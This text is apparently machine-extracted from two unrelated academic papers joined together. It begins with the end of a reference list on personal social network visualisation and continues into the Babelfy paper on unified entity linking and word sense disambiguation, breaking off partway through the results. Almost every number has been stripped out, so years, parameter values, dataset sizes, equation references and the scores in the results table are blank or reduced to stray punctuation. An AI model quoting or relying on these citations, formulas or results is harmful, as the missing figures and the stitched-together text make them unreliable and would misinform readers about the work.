s. ( ), to dwell among friends: per- sonal networks in town and city, university of chicago press, chicago, il. freeman, l. c. ( ). visualizing social networks. journal of social structure, ( ). freeman, l. c. ( ). the development of social network analysis. a study in the sociology of science. empirical press, vancouver, bc. fu, y. c. ( ). measuring personal networks with daily contacts: a single-item survey question and the contact diary. social networks, ( ): – . gamper, m., schönhuth, m. and kronenwett, m. ( ). bringing qualitative and quantitative data together: collecting network data with the help of the software tool vennmaker. in safar, m. and mahdi, k. (eds), social networking and community behavior modeling: qualitative and quantitative measures, hershley, pa: – . bielefeld (germany). hersberger, j. ( ). a qualitative approach to ex- amining information transfer via social networks among homeless populations. the new review of information behaviour research, ( ): – . hogan, b., carrasco, j. a. and wellman, b. ( ). visualizing personal networks: working with partici- pant-aided sociograms. field methods, ( ): – . kahn, r. l. and antonucci, t. ( ). supports of the elderly: family/friends/professionals. final report to the national institute on aging bethesda, md. killworth, p. d., johnsen, e. c., bernard, h. r., ann shelley, g. and mccarty, c. ( ). estimating the size of personal networks. social networks, ( ): – . lubbers, m. j., molina, j. l. and mccarty, c. ( ). personal networks and ethnic identifications. international sociology, ( ): – . mccallister, l. and fischer, c. s. ( ). a proce- dure for surveying personal networks. sociological methods & research, ( ): – . connections mccarty, c. ( ). structure in personal networks. journal of social structure, ( ). mccarty, c. and govindaramanujam, s. ( ). a modified elicitation of personal networks using dynamic visualization. connections, ( ): – . mccarty, c., killworth, p. d., bernard, r., johnsen, e. c. and shelley, g. a. ( ). comparing two meth- ods for estimating network size. human organization, ( ): – . mccarty, c., molina, j. l., aguilar, c. and rota, l. ( ). a comparison of social network mapping and personal network visualization. field methods, ( ): – . marin, a. ( ). are respondents more likely to list alters with certain characteristics? implications for name generator data. social networks, ( ): – . marin, a. and hampton, k. n. ( ). simplifying the personal network name generator. field methods, ( ): – . maya jariego, i. and holgado, d. ( ). lazos fuertes y proveedores múltiples de apoyo: com- paración de dos formas de representación gráfica de las redes personales. empiria: revista de metodología de ciencias sociales, : – . maya-jariego, i. ( ). usos del análisis de redes en la intervención comunitaria. redes. revista his- pana para el análisis de redes sociales, ( ): – . maya jariego, i. ( ). why name generators with a fixed number of alters may be a pragmatic option for personal network analysis. american journal of com- munity psychology, ( – ): – . maya-jariego, i., & armitage, n. ( ). multiple senses of community in migration and commuting: the interplay between time, space and relations. interna- tional sociology, ( ): – . maya-jariego, i. ( ). sentido de comunidad y potenciación comunitaria. apuntes de psicología, ( ): – . brass, d., labianca, g., mehra, a., halgin, d., and borgatti, s. p. ( ). imaginary worlds: using visual network scales to capture perceptions of social net- works. contemporary perspectives on organizational social networks, emerald group publishing: – . bradford (united kingdom). milardo, r. m. ( ). comparative methods for delineating social networks. journal of social and per- sonal relationships, ( ): – . moreno, j. l. ( ). who shall survive? a new ap- proach to the problem of human interrelations. nervous and mental disease monograph series no , nervous and mental disease publishing, washington, dc. moreno, j. l. ( ). who shall survive? foun- dations of sociometry, group psychotherapy and socio-drama, nd ed., beacon house, oxford. pearce, j. and milne, e. j. ( ). participation and community on bradford’s traditionally white estates: a community research project. available at: http://www. jrf.org.uk/sites/files/jrf/bradford-participation-commu- nity-full.pdf. retrieved: december , . pool, i. s. and kochen, m. ( ). contacts and influence. social networks, ( ): – . ratti, c., frenchman, d., pulselli, r. m., and williams, s. ( ). mobile landscapes: using location data from cell phones for urban analysis. environment and planning b: planning and design, ( ): – . reyes, c. ( ). eliciting data on social relation- ships: the use of hand-drawn network maps in tracing the perception of digitally mediated social ties. interna- tional review of social research, ( ): – . roberts, s. g. b., dunbar, r. i. m., pollet, t. v. and kuppens, t. ( ). exploring variation in active net- work size: constraints and ego characteristics. social networks, ( ): – . roberts, s. g. b., wilson, r., fedurek, p. and dunbar, r. i. m. ( ). individual differences and per- sonal social network size and structure. personality and individual differences, ( ): – . ryan, l. and d’angelo, a. ( ). changing times: migrants’ social network analysis and the challenges of longitudinal research. social networks, : – . ryan, l., mulholland, j. and agoston, a. ( ). talk- ing ties: reflecting on network visualisation and qualitative interviewing. sociological research online, ( , avail- able at http://www.socresonline.org.uk/ / / .html. retrieved: december , . samuelsson, m., thernlund, g. and ringstrom, j. ( ). using the five field map to describe the social network of children: a methodological study. internation- al journal of behavioral development, ( ): – . schiffer, e. and hauck, j. ( ). net-map: collecting social network data and facilitating network learning through participatory influence network map- ping. field methods, ( ): – . schönhuth, m., kronenwett, m., gamper, m. and stark, m. ( ). vennmaker . . available at http:// www.vennmaker.com retrieved: december , . tubaro, p., casilli, a. a. and mounier, l. ( ). elic- iting personal network data in web surveys through participant-generated sociograms. field methods, ( ): – . van der poel, m. g. m. ( ). delineating personal support networks. social networks, ( ): – . what the eye does not see: visualizations strategies for the data collection of personal network vehovar, v., lozar manfreda, k., koren, g. and hlebec, v. ( ). measuring ego-centered social net- works on the web: questionnaire design issues. social networks, ( ): – . von der lippe, h., & gamper, m. ( ). drawing or tabulating ego-centered networks? a mixed-methods comparison of questionnaire vs. visualization-based data collection. international journal of social re- search methodology, ( ): – . wellman, b. ( ). the community question: the intimate networks of east yorkers. american journal of community psychology, ( ): – . wellman, b. ( ). the network is personal: intro- duction to a special issue of social networks. social networks, ( ): – . wellman, b. and wortley, s. ( ). different strokes from different folks: community ties and social support. american journal of sociology, ( ): – . entity linking meets word sense disambiguation: a unified approach entity linking meets word sense disambiguation: a unified approach andrea moro, alessandro raganato, roberto navigli dipartimento di informatica, sapienza università di roma, viale regina elena , roma, italy {moro,navigli}@di.uniroma .it ale.raganato@gmail.com abstract entity linking (el) and word sense disam- biguation (wsd) both address the lexical am- biguity of language. but while the two tasks are pretty similar, they differ in a fundamen- tal respect: in el the textual mention can be linked to a named entity which may or may not contain the exact mention, while in wsd there is a perfect match between the word form (bet- ter, its lemma) and a suitable word sense. in this paper we present babelfy, a unified graph-based approach to el and wsd based on a loose identification of candidate mean- ings coupled with a densest subgraph heuris- tic which selects high-coherence semantic in- terpretations. our experiments show state-of- the-art performances on both tasks on differ- ent datasets, including a multilingual setting. babelfy is online at http://babelfy.org introduction the automatic understanding of the meaning of text has been a major goal of research in computational linguistics and related areas for several decades, with ambitious challenges, such as machine read- ing (etzioni et al., ) and the quest for knowl- edge (schubert, ). word sense disambiguation (wsd) (navigli, ; navigli, ) is a historical task aimed at assigning meanings to single-word and multi-word occurrences within text, a task which is more alive than ever in the research community. recently, the collaborative creation of large semi- structured resources, such as wikipedia, and knowl- edge resources built from them (hovy et al., ), such as babelnet (navigli and ponzetto, a), dbpedia (auer et al., ) and yago (hoffart et al., ), has favoured the emergence of new tasks, such as entity linking (el) (rao et al., ), and opened up new possibilities for tasks such as named entity disambiguation (ned) and wikifi- cation. the aim of el is to discover mentions of entities within a text and to link them to the most suitable entry in a reference knowledge base. how- ever, in contrast to wsd, a mention may be partial while still being unambiguous thanks to the context. for instance, consider the following sentence: ( ) thomas and mario are strikers playing in munich. this example makes it clear how intertwined the two tasks of wsd and el are. in fact, on the one hand, striker and play are polysemous words which can be disambiguated by selecting the game/soccer playing senses of the two words in a dictionary; on the other hand, thomas and mario are partial men- tions which have to be linked to the appropriate en- tries of a knowledge base, that is, thomas müller and mario gomez, two well-known soccer players. the two main differences between wsd and el lie, on the one hand, in the kind of inventory used, i.e., dictionary vs. encyclopedia, and, on the other hand, in the assumption that the mention is complete or potentially partial. notwithstanding these differ- ences, the tasks are similar in nature, in that they both involve the disambiguation of textual fragments according to a reference inventory. however, the re- search community has so far tackled the two tasks separately, often duplicating efforts and solutions. in contrast to this trend, research in knowledge acquisition is now heading towards the seamless in- transactions of the association for computational linguistics, ( ) – . action editor: noah smith. submitted / ; revised / ; published / . c© association for computational linguistics. tegration of encyclopedic and lexicographic knowl- edge into structured language resources (hovy et al., ), and the main representative of this new direc- tion is undoubtedly babelnet (navigli and ponzetto, a). given such structured language resources it seems natural to suppose that they might provide a common ground for the two tasks of wsd and el. more precisely, in this paper we explore the hy- pothesis that the lexicographic knowledge used in wsd is also useful for tackling the el task, and, vice versa, that the encyclopedic information uti- lized in el helps disambiguate nominal mentions in a wsd setting. we propose babelfy, a novel, uni- fied graph-based approach to wsd and el, which performs two main steps: i) it exploits random walks with restart, and triangles as a support for reweight- ing the edges of a large semantic network; ii) it uses a densest subgraph heuristic on the available seman- tic interpretations of the input text to perform a joint disambiguation with both concepts and named enti- ties. our experiments show the benefits of our syn- ergistic approach on six gold-standard datasets. related work . word sense disambiguation word sense disambiguation (wsd) is the task of choosing the right sense for a word within a given context. typical approaches for this task can be clas- sified as i) supervised, ii) knowledge-based, and iii) unsupervised. however, supervised approaches re- quire huge amounts of annotated data (zhong and ng, ; shen et al., ; pilehvar and navigli, ), an effort which cannot easily be repeated for new domains and languages, while unsupervised ones suffer from data sparsity and an intrinsic diffi- culty in their evaluation (agirre et al., ; brody and lapata, ; manandhar et al., ; van de cruys and apidianaki, ; di marco and nav- igli, ). on the other hand, knowledge-based approaches are able to obtain good performance us- ing readily-available structured knowledge (agirre et al., ; guo and diab, ; ponzetto and nav- igli, ; miller et al., ; agirre et al., ). some of these approaches marginally take into ac- count the structural properties of the knowledge base (mihalcea, ). other approaches, instead, lever- age the structural properties of the knowledge base by exploiting centrality and connectivity measures (sinha and mihalcea, ; tsatsaronis et al., ; agirre and soroa, ; navigli and lapata, ). one of the key steps of many knowledge-based wsd algorithms is the creation of a graph repre- senting the semantic interpretations of the input text. two main strategies to build this graph have been proposed: i) exploiting the direct connections, i.e., edges, between the considered sense candidates; ii) populating the graph according to (shortest) paths between them. in our approach we manage to unify these two strategies by automatically creating edges between sense candidates performing random walk with restart (tong et al., ). the recent upsurge of interest in multilinguality has led to the development of cross-lingual and mul- tilingual approaches to wsd (lefever and hoste, ; lefever and hoste, ; navigli et al., ). multilinguality has been exploited in different ways, e.g., by using parallel corpora to build multilingual contexts (guo and diab, ; banea and mihalcea, ; lefever et al., ) or by means of ensemble methods which exploit complementary sense evi- dence from translations in different languages (nav- igli and ponzetto, b). in this work, we present a novel exploitation of the structural properties of a multilingual semantic network. . entity linking entity linking (erbs et al., ; rao et al., ; cornolti et al., ) encompasses a set of similar tasks, which include named entity disambiguation (ned), that is the task of linking entity mentions in a text to a knowledge base (bunescu and pasca, ; cucerzan, ), and wikification, i.e., the automatic annotation of text by linking its relevant fragments of text to the appropriate wikipedia arti- cles. mihalcea and csomai ( ) were the first to tackle the wikification task. in their approach they disambiguate each word in a sentence independently by exploiting the context in which it occurs. how- ever, this approach is local in that it lacks a collective notion of coherence between the selected wikipedia pages. to overcome this problem, cucerzan ( ) introduced a global approach based on the simulta- neous disambiguation of all the terms in a text and the use of lexical context to disambiguate the men- tions. to maximize the semantic agreement milne and witten ( ) introduced the analysis of the se- mantic relations between the candidate senses and the unambiguous context, i.e., words with a single sense candidate. however, the performance of this algorithm depends heavily on the number of links incident to the target senses and on the availabil- ity of unambiguous words within the input text. to overcome this issue a novel class of approaches have been proposed (kulkarni et al., ; ratinov et al., ; hoffart et al., ) that exploit global and local features. however, these systems either rely on a difficult np-hard formalization of the problem which is infeasible for long text, or exploit popular- ity measures which are domain-dependent. in con- trast, we show that the semantic network structure can be leveraged to obtain state-of-the-art perfor- mance by synergistically disambiguating both word senses and named entities at the same time. recently, the explosion of on-line social network- ing services, such as twitter and facebook, have contributed to the development of new methods for the efficient disambiguation of short texts (ferrag- ina and scaiella, ; hoffart et al., ; böhm et al., ). thanks to a loose candidate identification technique coupled with a densest subgraph heuristic, we show that our approach is particularly suited for short and highly ambiguous text disambiguation. . the best of two worlds our main goal is to bring together the two worlds of wsd and el. on the one hand, this implies relaxing the constraint of a perfect association between men- tions and meanings, which is, instead, assumed in wsd. on the other hand, this relaxation leads to the inherent difficulty of encoding a full-fledged sense inventory for el. our solution to this problem is to keep the set of candidate meanings for a given men- tion as open as possible (see section ), so as to en- able high recall in linking partial mentions, while providing an effective method for handling this high ambiguity (see section ). a key assumption of our work is that the lexico- graphic knowledge used in wsd is also useful for tackling the el task, and vice versa the encyclopedic information utilized in el helps disambiguate nom- inal mentions in a wsd setting. we enable the joint treatment of concepts and named entities by enforc- ing high coherence in our semantic interpretations. wsd and entity linking together task. our task is to disambiguate and link all nominal and named entity mentions occurring within a text. the linking task is performed by asso- ciating each mention with the most suitable entry of a given knowledge base. we point out that our definition is unconstrained in terms of what to link, i.e., unlike wikification and wsd, we can link overlapping fragments of text. for instance, given the text fragment major league soccer, we identify and disambiguate several dif- ferent nominal and entity mentions: major league soccer, major league, league and soccer. in contrast to el, we link not only named entity mentions, such as major league soccer, but also nominal mentions, e.g., major league, to their corresponding meanings in the knowledge base. babelfy. we provide a unified approach to wsd and entity linking in three steps: . given a lexicalized semantic network, we as- sociate with each vertex, i.e., either concept or named entity, a semantic signature, that is, a set of related vertices (section ). this is a prelim- inary step which needs to be performed only once, independently of the input text. . given a text, we extract all the linkable frag- ments from this text and, for each of them, list the possible meanings according to the seman- tic network (section ). . we create a graph-based semantic interpreta- tion of the whole text by linking the candidate meanings of the extracted fragments using the previously-computed semantic signatures. we then extract a dense subgraph of this represen- tation and select the best candidate meaning for each fragment (section ). semantic network our approach requires the availability of a wide- coverage semantic network which encodes struc- tural and lexical information both of an encyclope- dic and of a lexicographic kind. although in prin- ciple any semantic network with these properties mentions which are not contained in the reference knowl- edge base are not taken into account. could be utilized, in our work we used the babel- net . . semantic network (navigli and ponzetto, a) since it is the largest multilingual knowl- edge base, obtained from the automatic seamless integration of wikipedia and wordnet (fellbaum, ). we consider babelnet as a directed multi- graph which contains both concepts and named en- tities as its vertices and a multiset of semantic rela- tions as its edges. we leverage the multilingual lex- icalizations of the vertices of babelnet to identify mentions in the input text. for example, the entity fc bayern munich can be lexicalized in different languages, e.g., f.c. bayern de múnich in spanish, die roten in english and bayern münchen in ger- man, among others. as regards semantic relations, the only information we use is that of the end points, i.e., vertices, that these relations connect, while ne- glecting the relation type. building semantic signatures one of the major issues affecting both manually- curated and automatically constructed semantic net- works is data sparsity. for instance, we calculated that the average number of incident edges is roughly in wordnet, in babelnet and in yago , to mention a few. although automatically-built re- sources typically provide larger amounts of edges, two issues have to be taken into account: concepts which should be related might not be directly con- nected despite being structurally close within the network, and, vice versa, weakly-related or even un- related concepts can be erroneously connected by an edge. for instance, in babelnet we do not have an edge between playmaker and thomas müller, while we have an incorrect edge connecting fc bayern munich and yellow submarine (song). however, this crisp notion of relatedness can be overcome by exploiting the global structure of the semantic net- work, thereby obtaining a more precise and higher- coverage measure of relatedness. we address this issue in two steps: first, we provide a structural weighting of the network’s edges; second, for each vertex we create a set of related vertices using ran- dom walks with restart. http://babelnet.org http://www.wikipedia.org structural weighting. our first objective is to as- sign higher weights to edges which are involved in more densely connected areas of the directed net- work. to this end, inspired by the local cluster- ing coefficient measure (watts and strogatz, ) and its recent success in word sense induction (di marco and navigli, ), we use directed tri- angles, i.e., directed cycles of length , and weight each edge (v,v′) by the number of directed triangles it occurs in: weight(v,v′) := |{(v,v′,v′′) : (v,v′), ( ) (v′,v′′),(v′′,v) ∈ e}|+ we add one to each weight to ensure the highest de- gree of reachability in the network. random walk with restart. our goal is to cre- ate a semantic signature (i.e., a set of highly related vertices) for each concept and named entity of the semantic network. to do this, we perform a random walk with restart (rwr) (tong et al., ), that is, a stochastic process that starts from an initial vertex of the graph and then, for a fixed number n of steps or until convergence, explores the graph by choos- ing the next vertex within the current neighborhood or by restarting from the initial vertex with a given, fixed restart probability α. for each edge (v,v′) in the network, we model the conditional probability p(v′|v) as the normalized weight of the edge: p(v′|v) = weight(v,v ′)∑ v′′∈v weight(v,v ′′) where v is the set of vertices of the semantic net- work and weight(v,v′) is the function defined in equation . we then run the rwr from each ver- tex v of the semantic network for a fixed number n of steps (we show in algorithm our rwr pseu- docode). we keep track of the encountered ver- tices using the map counts, i.e., we increase the counter associated with vertex v′ in counts every time we hit v′ during a rwr started from v (see line ). as a result, we obtain a frequency distri- bution over the whole set of concepts and entities. to eliminate weakly-related vertices we keep only those items that were hit at least η times (see lines – ). finally, we save the remaining vertices in the set semsignv which is the semantic signature of v (see line ). rwr can be used with an initial set of vertices, however in this paper we use a single initial vertex. algorithm random walk with restart. : input: v, the starting vertex; α, the restart probability; n, the number of steps to be executed; p , the transition probabilities; η, the frequency threshold. : output: semsignv, set of related vertices for v. : function rwr(v,α,n,p,η) : v′ := v : counts := new map < synset,integer > : while n > do : if random() > α then : given the transition probabilities p(·|v′) : of v′, choose a random neighbor v′′ : v′ := v′′ : counts[v′] + + : else : restart the walk : v′ := v : n := n− : for each v′ in counts.keys() do : if counts[v′] < η then : remove v′ from counts.keys() : return semsignv = counts.keys() the creation of our set of semantic signatures, one for each vertex in the semantic network, is a prelim- inary step carried out once only before starting pro- cessing any input text. we now turn to the candidate identification and disambiguation steps. candidate identification given a text as input, we apply part-of-speech tag- ging and identify the set f of all the textual frag- ments, i.e., all the sequences of words of maximum length five, which contain at least one noun and that are substrings of lexicalizations in babelnet, i.e., those fragments that can potentially be linked to an entry in babelnet. for each textual fragment f ∈ f , i.e., a single- or multi-word expression of the input text, we look up the semantic network for candidate meanings, i.e., vertices that contain f or, only for named entities, a superstring of f as their lexical- ization. for instance, for sentence ( ) in the intro- duction, we identify the following textual fragments: thomas, mario, strikers, munich. this output is ob- tained thanks to our loose candidate identification routine, i.e., based on superstring matching instead of exact matching, which, for instance, enables us to recognize the right candidate mario gomez for the mention mario even if this named entity does not have mario as one of its lexicalizations (for an anal- ysis of the impact of this routine against the exact matching approach see the discussion in section ). moreover, as we stated in section , we allow overlapping fragments, e.g., for major league we recognize league and major league. we denote with cand(f) the set of all the candidate meanings of fragment f. for instance, for the noun league we have that cand(league) contains among others the sport word sense and the tv series named entity. candidate disambiguation semantic interpretation graph. after the identi- fication of fragments (f ) and their candidate mean- ings (cand(·)), we create a directed graph gi = (vi,ei) of the semantic interpretations of the input text. we show the pseudocode in algorithm . vi contains all the candidate meanings of all fragments, that is, vi := {(v,f) : v ∈ cand(f),f ∈ f}, where f is a fragment of the input text and v is a candidate babel synset that has a lexicalization which is equal to or is a superstring of f (see lines – ). the set of edges ei connects related meanings and is pop- ulated as follows: we add an edge from (v,f) to (v′,f ′) if and only if f = f ′ and v′ ∈ semsignv (see lines – ). in other words, we connect two candidate meanings of different fragments if one is in the semantic signature of the other. for instance, we add an edge between (mario gomez, mario) and (thomas müller, thomas), while we do not add one between (mario gomez, mario) and (mario basler, mario) since these are two candidate meanings of the same fragment, i.e., mario. in figure , we show an excerpt of our graph for sentence ( ). at this point we have a graph-based representa- tion of all the possible interpretations of the input text. in order to drastically reduce the degree of am- biguity while keeping the interpretation coherence as high as possible, we apply a novel densest sub- graph heuristic (see line ), whose description we defer to the next paragraph. the result is a sub- graph which contains those semantic interpretations that are most coherent to each other. however, this subgraph might still contain multiple interpretations for the same fragment, and even unambiguous frag- ments which are not correct. therefore, the final (tomás milián, thomas) (thomas müller, thomas) (forward, striker) (striker, striker) (fc bayern munich, munich) (munich, munich) (mario adorf, mario) (mario basler, mario) (mario gomez, mario) figure : an excerpt of the semantic interpretation graph automatically built for the sentence thomas and mario are strikers playing in munich (the edges connecting the correct meanings are in bold). step is the selection of the most suitable candidate meaning for each fragment f given a threshold θ to discard semantically unrelated candidate meanings. we score each meaning v ∈ cand(f) with its nor- malized weighted degree in the densest subgraph: score((v,f)) = w(v,f) ·deg((v,f))∑ v′ ∈ cand(f) w(v′,f) ·deg((v′,f)) ( ) where w(v,f) is the fraction of fragments the candi- date meaning v connects to: w(v,f) := |{f′ ∈ f : ∃v′ s.t. ((v,f),(v′,f′)) or ((v′,f′),(v,f)) ∈ ei}| |f |− the rationale behind this scoring function is to take into account both the semantic coherence, us- ing a graph centrality measure among the candidate meanings, and the lexical coherence, in terms of the number of fragments a candidate relates to. finally, we link each f to the highest ranking can- didate meaning v? if score((v?,f)) ≥ θ, where θ is a fixed threshold (see lines – of algorithm ). for instance, in sentence ( ) and for the fragment mario we select mario gomez as our final candidate meaning and link it to the fragment. linking by densest subgraph. we now illustrate our novel densest subgraph heuristic, used in line of algorithm , for reducing the level of ambiguity of the initial semantic interpretation graph gi . the main idea here is that the most suitable meanings of each text fragment will belong to the densest area of the graph. for instance, in figure the (candidate, fragment) pairs (thomas müller, thomas), (mario gomez, mario), (striker, striker) and (fc bayern we denote with deg(v) the overall number of incoming and outgoing edges, i.e., deg(v) := deg+(v) + deg−(v). algorithm candidate disambiguation. : input: f , the fragments in the input text; semsign, the semantic signatures; µ, ambiguity level to be reached; cand, fragments to candidate meanings. : output: selected, disambiguated fragments. : function disamb(f,semsign,µ,cand) : vi := ∅;ei := ∅ : gi := (vi,ei) : for each fragment f ∈ f do : for each candidate v ∈ cand(f) do : vi := vi ∪{(v,f)} : for each ((v,f),(v′,f′)) ∈ vi ×vi do : if f = f′ and v′ ∈ semsignv then : ei := ei ∪{((v,f),(v′,f′))} : g?i := denssub(f,cand,gi,µ) : selected := new map < string,synset > : for each f ∈ f s.t. ∃(v,f) ∈ v ?i do : cand?(f) := {v : (v,f) ∈ v ?i } : v? := arg maxv∈cand?(f) score((v,f)) : if score((v?,f)) ≥ θ then : selected(f) := v? : return selected munich, munich) form a dense subgraph supporting their relevance for sentence ( ). the problem of identifying the densest subgraph of size at least k is np-hard (feige et al., ). therefore, we define a heuristic for k-partite graphs inspired by a -approximation greedy algorithm for arbitrary graphs (charikar, ; khuller and saha, ). our adapted strategy for selecting a dense subgraph of gi is based on the iterative removal of low-coherence vertices, i.e., fragment interpreta- tions. we show the pseudocode in algorithm . we start with the initial graph g( )i at step t = (see line ). for each step t (lines – ), first, we identify the most ambiguous fragment fmax, i.e., the one with the maximum number of candidate mean- algorithm densest subgraph. : input: f , the set of all fragments in the input text; cand, from fragments to candidate meanings; g ( ) i , the full semantic interpretation graph; µ, ambiguity level to be reached. : output: g?i , a dense subgraph. : function denssub(f,cand,g( )i ,µ) : t := : g?i := g ( ) i : while true do : fmax := arg maxf∈f |{v : ∃(v,f) ∈ v (t) i }| : if |{v : ∃(v,fmax) ∈ v (t)i }|≤ µ then : break; : vmin:= argmin v ∈ cand(fmax) score((v,fmax)) : v (t+ ) i := v (t) i \{(vmin,fmax)} : e (t+ ) i := e (t) i ∩v (t+ ) i ×v (t+ ) i : g (t+ ) i := (v (t+ ) i ,e (t+ ) i ) : if avgdeg(g(t+ )i ) > avgdeg(g ? i) then : g?i := g (t+ ) i : t := t + : return g?i ings in the graph (see line ). next, we discard the weakest interpretation of the current fragment fmax. to do so, we determine the lexical and seman- tic coherence of each candidate meaning (v,fmax) using formula (see line ). we then remove from our graph g(t)i the lowest-coherence vertex (vmin,fmax), i.e., the one whose score is minimum (see lines – ). for instance, in figure , fmax is the fragment mario and we have: score((mario gomez, mario)) ∝ · = , score((mario basler, mario)) ∝ · = . and score((mario adorf, mario)) ∝ · = . , so we remove (mario basler, mario) from the graph since its score is minimum. we then move to the next step, i.e., we set t := t + (see line ) and repeat the low-coherence re- moval step. we stop when the number of remaining candidates for each fragment is below a threshold µ, i.e., |{v : ∃(v,f) ∈ v (t)i }| ≤ µ ∀f ∈ f (see lines – ). during each iteration step t we com- pute the average degree of the current graph g(t)i , i.e., avgdeg(g(t)i ) = |e(t) i | |v (t) i | . finally, we select as the densest subgraph of the initial semantic interpre- tation graph gi the graph g?i that maximizes the av- erage degree (see lines – ). experimental setup datasets. we carried out our experiments on six datasets, four for wsd and two for el: • the semeval- task dataset for multilin- gual wsd (navigli et al., ), which consists of documents in different domains, available in languages. for each language, all noun occurrences were annotated using babelnet, thereby providing wikipedia and wordnet an- notations wherever applicable. the number of mentions to be disambiguated roughly ranges from k to k per language in the different se- tups. • the semeval- task dataset for coarse- grained english all-words wsd (navigli et al., ). we take into account only nominal men- tions obtaining a dataset containing nouns to be disambiguated using wordnet. • the semeval- task dataset for fine- grained english all-words wsd (pradhan et al., ). we considered only nominal mentions resulting in nouns annotated with wordnet synsets. • the senseval- dataset for english all-words wsd (snyder and palmer, ), which con- tains nouns to be disambiguated using wordnet. • kore (hoffart et al., ), which consists of short english sentences (mean length of words) with a total number of mentions manually annotated using yago , for which a wikipedia mapping is available. this dataset was built with the idea of testing against a high level of ambiguity for the el task. • aida-conll (hoffart et al., ), which consists of english articles, for a total of roughly k named entity mentions anno- tated with yago concepts separated in devel- opment, training and test sets. we exploited the pos tags already available in the semeval and senseval datasets, while we used the stanford pos tagger (toutanova et al., ) for the english sentences in the last two datasets. we used aida-conll as it is the most recent and largest available dataset for el (hachey et al., ). the tac kbp datasets are available only to participants. parameters. we fixed the parameters of rwr (section ) to the values α = . , η = and n = m which maximize f on a manually cre- ated tuning set made up of gold-standard seman- tic signatures. we tuned our two disambiguation pa- rameters µ = and θ = . by optimizing f on the trial dataset of the semeval- task on mul- tilingual wsd (navigli et al., ). we used the same parameters on all the other wsd datasets. as for el, we used the training part of aida-conll (hoffart et al., ) to set µ = and θ = . . . systems multilingual wsd. we evaluated our system on the semeval- task by comparing it with the participating systems: • umcc-dlsi (gutiérrez et al., ) a state- of-the-art personalized pagerank-based ap- proach that exploits the integration of different sources of knowledge, such as wordnet do- mains/affect (strapparava and valitutti, ), sumo (zouaq et al., ) and the extended wordnet (mihalcea and moldovan, ); • daebak! (manion and sainudiin, ) which performs wsd on the basis of periph- eral diversity within subgraphs of babelnet; • getalp (schwab et al., ) which uses an ant colony optimization technique together with the classical measure of lesk ( ). we also compared with ukb w w (agirre and soroa, ), a state-of-the-art approach for knowledge-based wsd, based on personalized pagerank (haveliwala, ). we used the same mapping from words to senses that we used in our approach, default parameters and babelnet as the input graph. moreover, we compared our system with ims (zhong and ng, ), a state-of-the- art supervised english wsd system which uses an svm trained on sense-annotated corpora, such as semcor (miller et al., ) and dso (ng and lee, ), among others. we used the ims model out-of-the-box with most frequent sense (mfs) as backoff routine since the model obtained using the task trial data performed worse. we followed the original task formulation and evaluated the synsets in three different settings, i.e., ./ukb wsd -d dict.txt -k kb.bin --ppr w w ctx.txt when using babelnet senses, wikipedia senses and wordnet senses, thanks to babelnet being a super- set of the other two inventories. we ran our sys- tem on a document-by-document basis, i.e., disam- biguating each document at once, so as to test its effectiveness on long coherent texts. performance was calculated in terms of f score. we also com- pared the systems with the mfs baseline computed for the three inventories (navigli et al., ). coarse-grained wsd. for the semeval- task we compared our system with the two top- ranked approaches, i.e., nus-pt (chan et al., ) and uor-ssi (navigli, ), which respectively exploited parallel texts and enriched semantic paths in a semantic network, the previously described ukb w w system, a knowledge-based wsd ap- proach (ponzetto and navigli, ) which exploits an automatic extension of wordnet, and, as base- line, the mfs. fine-grained wsd. for the remaining fine- grained wsd datasets, i.e., senseval- and semeval- task , we compared our approach with the previously described state-of-the-art systems ukb and ims, and, as baseline, the mfs. kore and aida-conll. for the kore and aida-conll datasets we compared our sys- tem with six approaches, including state-of-the-art ones (hoffart et al., ; cornolti et al., ): • mw, i.e., the normalized google distance as defined by milne and witten ( ); • kpcs (hoffart et al., ), which calcu- lates a mutual information weighted vector of keyphrases for each candidate and then uses the cosine similarity to obtain candidates’ scores; • kore and its variants korelsh−g and korelsh−f (hoffart et al., ), based on similarity measures that exploit the overlap be- tween phrases associated with the considered entities (kore) and a hashing technique to re- duce the space needed by the keyphrases asso- ciated with the entities (lsh-g, lsh-f); • tagme . (ferragina and scaiella, ) which uses the relatedness measure defined we report the results as given by agirre et al. ( ). we used the out-of-the-box restful api available at http://tagme.di.unipi.it sens sem semeval- english french german italian spanish system wn wn wn wiki bn wiki bn wiki bn wiki bn wiki bn babelfy . . . . . . ? . . . . . . . ims . . . – – – – – – – – – – ukb w w ? . ? . . – . – . – . – . – . umcc-dlsi – – . . . ? . . ? . . ? . . ? . . daebak! – – – – . – . – . – ? . – . getalp-bn – – . – . – . – . – . – . mfs . . ? . ? . ? . . . . ? . . . . ? . babelfy unif. weights . . . . . . . . . . . . . babelfy w/o dens. sub. . . . . . . . . . . . . . babelfy only concepts . . . . . . . . . . . . . babelfy on sentences . . . . . . . . . . . . . table : f scores (percentages) of the participating systems of semeval- task together with mfs, ukb w w, ims, our system and its ablated versions on the senseval- , semeval- task and semeval- datasets. the first system which has a statistically significant difference from the top system is marked with ? (χ , p < . ). by milne and witten ( ) weighted with the commonness of a sense together with the keyphraseness measure defined by mihal- cea and csomai ( ) to exploit the context around the target word; • illinois wikifier (cheng and roth, ) which combines local features, such as com- monness and tf-idf between mentions and wikipedia pages, with global coherence fea- tures based on wikipedia links and relational inference; • dbpedia spotlight (mendes et al., ) which uses lingpipe’s string matching algo- rithm implementation together with a weighted cosine similarity measure to recognize and dis- ambiguate mentions. we also compared with ukb w w, introduced above. note that we could not use supervised sys- tems, as the training data of aida-conll covers less than half of the mentions used in the testing part and less than % of the entities considered in kore . to enable a fair comparison, we ran our system by restricting the babelnet sense inventory of the target mentions to the english wikipedia. as is customary in the literature, we calculated the sys- tems’ accuracy for both entity linking datasets. we used the out-of-the-box java api available from http://cogcomp.cs.illinois.edu/page/download view/wikifier we used the version of dbpedia spotlight as it ob- tains better scores on the considered datasets in comparison to the new version (daiber et al., ). we used the out-of-the- box restful api available at http://spotlight.dbpedia.org results multilingual wsd. in table we show the f performance on the semeval- task for the three setups: wordnet, wikipedia and babelnet. using babelnet we surpass all systems on english and german and obtain performance comparable with the best systems on two other languages (ukb on italian and umcc-dlsi on spanish). using the wordnet sense inventory, our results are on a par with the best system, i.e., ims. on wikipedia our results range between . % (french) and . % f (english), i.e., more than points higher than the current state of the art (umcc-dlsi) in all lan- guages. as for the mfs baseline, which is known to be very competitive in wsd (navigli, ), we beat it in all setups except for german on wikipedia. interestingly, we surpass the wordnet mfs by . points, a significant result for a knowledge-based system (see also (pilehvar and navigli, )). coarse- and fine-grained wsd. in table , we show the results of the systems on the semeval- coarse-grained wsd dataset. as can be seen, we obtain the second best result after 